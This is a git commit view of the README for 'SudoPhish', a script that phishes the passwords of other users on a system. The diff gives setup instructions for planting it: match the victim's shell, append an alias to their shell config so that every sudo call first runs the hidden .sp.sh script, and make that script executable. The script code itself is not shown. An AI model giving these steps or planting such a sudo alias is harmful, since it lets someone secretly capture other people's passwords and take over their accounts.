SudoPhish

Unnamed repository; edit this file 'description' to name the repository.
Log | Files | Refs | README | LICENSE

commit 583fcab91250885f2e72b09faf1b7ea7ffc1ee34
parent affa4caaa6526abc044c1d4f54eecba4fa0bf180
Author: MichaelDim02 <31562759+MichaelDim02@users.noreply.github.com>
Date:   Thu,  8 Jul 2021 09:27:29 +0000

Update README.md
Diffstat:
MREADME.md | 2+-
1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/README.md b/README.md @@ -12,4 +12,4 @@ A short self-destructive script to phish the passwords of the users on your syst + Make sure you edit the shabang according to the users interactive SH. If they use bash, make sure the script starts with ```#!/bin/bash```, if they use zsh, then make sure it starts with ```#!/bin/zsh``` etc. It does not work with fish. Default is bash. + Set the ```$shellfile``` variable accordingly (line 21). Default is ```".bashrc"``` + Put the following line at the END of the Shell config file: ``` alias sudo=".sp.sh; sudo" ``` -+ Rename the file .sp.sh ++ Rename the file to ```.sp.sh``` and give it executable permission with ```chmod +x .sp.sh```